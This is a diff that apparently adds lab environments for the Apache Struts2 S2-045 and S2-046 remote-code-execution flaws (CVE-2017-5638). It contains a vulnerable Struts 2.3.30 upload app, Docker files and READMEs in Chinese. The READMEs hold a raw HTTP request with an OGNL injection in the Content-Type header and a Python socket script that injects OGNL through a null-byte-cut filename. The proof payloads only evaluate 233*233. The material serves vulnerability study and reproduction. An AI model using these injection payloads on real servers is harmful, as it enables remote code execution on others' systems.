diff --git a/base/struts2/2.3.30/Dockerfile b/base/struts2/2.3.30/Dockerfile new file mode 100644 index 0000000000..da030df0ca --- /dev/null +++ b/base/struts2/2.3.30/Dockerfile @@ -0,0 +1,12 @@ +FROM maven:3-jdk-8 + +LABEL maintainer="phithon " + +COPY ./ /usr/src/ +WORKDIR /usr/src + +RUN set -ex \ + && mvn compile jetty:help + +EXPOSE 8080 +CMD ["mvn", "jetty:run"] diff --git a/base/struts2/2.3.30/pom.xml b/base/struts2/2.3.30/pom.xml new file mode 100644 index 0000000000..df30b310ac --- /dev/null +++ b/base/struts2/2.3.30/pom.xml @@ -0,0 +1,39 @@ + + 4.0.0 + org.pwntester + Struts2FileUpload + war + 1.0-SNAPSHOT + Struts2FileUpload Maven Webapp + http://maven.apache.org + + + + org.apache.struts + struts2-core + 2.3.30 + + + + + + Struts2FileUpload + + + org.eclipse.jetty + jetty-maven-plugin + 9.2.11.v20150529 + + 10 + + / + + + 8080 + + + + + + diff --git a/base/struts2/2.3.30/src/main/java/org/pwntester/action/FileUploadAction.java b/base/struts2/2.3.30/src/main/java/org/pwntester/action/FileUploadAction.java new file mode 100755 index 0000000000..3a3d965624 --- /dev/null +++ b/base/struts2/2.3.30/src/main/java/org/pwntester/action/FileUploadAction.java @@ -0,0 +1,55 @@ +package org.pwntester.action; + +import com.opensymphony.xwork2.ActionSupport; +import java.io.File; + +public class FileUploadAction extends ActionSupport { + + private String contentType; + private File upload; + private String fileName; + private String caption; + + public String input() throws Exception { + return SUCCESS; + } + + + public String upload() throws Exception { + return SUCCESS; + } + + public String getUploadFileName() { + return fileName; + } + + public void setUploadFileName(String fileName) { + this.fileName = fileName; + } + + public String getUploadContentType() { + return contentType; + } + + public void setUploadContentType(String contentType) { + this.contentType = contentType; + } + + public File getUpload() { + return upload; + } + + public void setUpload(File upload) { + this.upload = upload; + } + + public String getCaption() { + return caption; + } + + public void setCaption(String caption) { + this.caption = caption; + } +} + + diff --git a/base/struts2/2.3.30/src/main/resources/global.properties b/base/struts2/2.3.30/src/main/resources/global.properties new file mode 100644 index 0000000000..c44b2d81a0 --- /dev/null +++ b/base/struts2/2.3.30/src/main/resources/global.properties @@ -0,0 +1,3 @@ +struts.messages.error.file.too.large = Uploaded File size is too large +struts.messages.error.content.type.not.allowed =File type is not allowed. +struts.messages.error.file.extension.not.allowed =File extension is not allowed. \ No newline at end of file diff --git a/base/struts2/2.3.30/src/main/resources/struts.xml b/base/struts2/2.3.30/src/main/resources/struts.xml new file mode 100755 index 0000000000..34f39d23b9 --- /dev/null +++ b/base/struts2/2.3.30/src/main/resources/struts.xml @@ -0,0 +1,25 @@ + + + + + + + + + + + + + + pages/upload.jsp + + + + pages/upload.jsp + pages/upload-success.jsp + + + + \ No newline at end of file diff --git a/base/struts2/2.3.30/src/main/webapp/WEB-INF/web.xml b/base/struts2/2.3.30/src/main/webapp/WEB-INF/web.xml new file mode 100755 index 0000000000..4e83f46cbb --- /dev/null +++ b/base/struts2/2.3.30/src/main/webapp/WEB-INF/web.xml @@ -0,0 +1,17 @@ + + + + Struts 2 Web Application + + + struts2 + org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter + + + struts2 + /* + + + \ No newline at end of file diff --git a/base/struts2/2.3.30/src/main/webapp/pages/upload-success.jsp b/base/struts2/2.3.30/src/main/webapp/pages/upload-success.jsp new file mode 100755 index 0000000000..566be1aeba --- /dev/null +++ b/base/struts2/2.3.30/src/main/webapp/pages/upload-success.jsp @@ -0,0 +1,27 @@ +<%@ taglib prefix="s" uri="/struts-tags" %> + + + Struts2 Showcase - Fileupload sample + + + +
+

Fileupload sample

+
+ +
+
+
+ + + + + + + +
+
+
+ + + diff --git a/base/struts2/2.3.30/src/main/webapp/pages/upload.jsp b/base/struts2/2.3.30/src/main/webapp/pages/upload.jsp new file mode 100755 index 0000000000..b02a89cdc3 --- /dev/null +++ b/base/struts2/2.3.30/src/main/webapp/pages/upload.jsp @@ -0,0 +1,31 @@ +<%@ page + language="java" + contentType="text/html; charset=UTF-8" + pageEncoding="UTF-8"%> +<%@ taglib prefix="s" uri="/struts-tags" %> + + + Struts2 Showcase - Fileupload sample + + + +
+

Fileupload sample

+
+ +
+
+
+
    +
  • ContentType:
    • +
  • FileName:
    • +
  • File:
    • +
  • Caption:
    • +
+
+
+
+ + + + diff --git a/struts2/s2-045/1.png b/struts2/s2-045/1.png new file mode 100644 index 0000000000..cfec1b4544 Binary files /dev/null and b/struts2/s2-045/1.png differ diff --git a/struts2/s2-045/README.md b/struts2/s2-045/README.md new file mode 100644 index 0000000000..566b612400 --- /dev/null +++ b/struts2/s2-045/README.md @@ -0,0 +1,39 @@ +# S2-045 远程代码执行漏洞(CVE-2017-5638) + +影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 + +漏洞详情: + + - http://struts.apache.org/docs/s2-045.html + - https://blog.csdn.net/u011721501/article/details/60768657 + - https://paper.seebug.org/247/ + +## 漏洞环境 + +执行如下命令启动struts2 2.3.30: + +``` +docker-compose up -d +``` + +环境启动后,访问`http://your-ip:8080`即可看到上传页面。 + +## 漏洞复现 + +直接发送如下数据包,可见`233*233`已成功执行: + +``` +POST / HTTP/1.1 +Host: localhost:8080 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.8,es;q=0.6 +Connection: close +Content-Length: 0 +Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data + + +``` + +![](1.png) diff --git a/struts2/s2-045/docker-compose.yml b/struts2/s2-045/docker-compose.yml new file mode 100644 index 0000000000..68a1132844 --- /dev/null +++ b/struts2/s2-045/docker-compose.yml @@ -0,0 +1,6 @@ +version: '2' +services: + struts2: + image: vulhub/struts2:2.3.30 + ports: + - "8080:8080" diff --git a/struts2/s2-046/1.png b/struts2/s2-046/1.png new file mode 100644 index 0000000000..d438793f8f Binary files /dev/null and b/struts2/s2-046/1.png differ diff --git a/struts2/s2-046/README.md b/struts2/s2-046/README.md new file mode 100644 index 0000000000..c07019527f --- /dev/null +++ b/struts2/s2-046/README.md @@ -0,0 +1,55 @@ +# S2-046 远程代码执行漏洞(CVE-2017-5638) + +影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 + +漏洞详情: + + - https://cwiki.apache.org/confluence/display/WW/S2-046 + - https://xz.aliyun.com/t/221 + +## 漏洞环境 + +执行如下命令启动struts2 2.3.30: + +``` +docker-compose up -d +``` + +环境启动后,访问`http://your-ip:8080`即可看到上传页面。 + +## 漏洞复现 + +与s2-045类似,但是输入点在文件上传的filename值位置,并需要使用`\x00`截断。 + +由于需要发送畸形数据包,我们简单使用原生socket编写payload: + +```python +import socket + +q = b'''------WebKitFormBoundaryXd004BVJN9pBYBL2 +Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',233*233)}\x00b" +Content-Type: text/plain + +foo +------WebKitFormBoundaryXd004BVJN9pBYBL2--'''.replace(b'\n', b'\r\n') +p = b'''POST / HTTP/1.1 +Host: localhost:8080 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.8,es;q=0.6 +Connection: close +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXd004BVJN9pBYBL2 +Content-Length: %d + +'''.replace(b'\n', b'\r\n') % (len(q), ) + +with socket.create_connection(('your-ip', '8080'), timeout=5) as conn: + conn.send(p + q) + print(conn.recv(10240).decode()) + +``` + +`233*233`已成功执行: + +![](1.png) diff --git a/struts2/s2-046/docker-compose.yml b/struts2/s2-046/docker-compose.yml new file mode 100644 index 0000000000..68a1132844 --- /dev/null +++ b/struts2/s2-046/docker-compose.yml @@ -0,0 +1,6 @@ +version: '2' +services: + struts2: + image: vulhub/struts2:2.3.30 + ports: + - "8080:8080"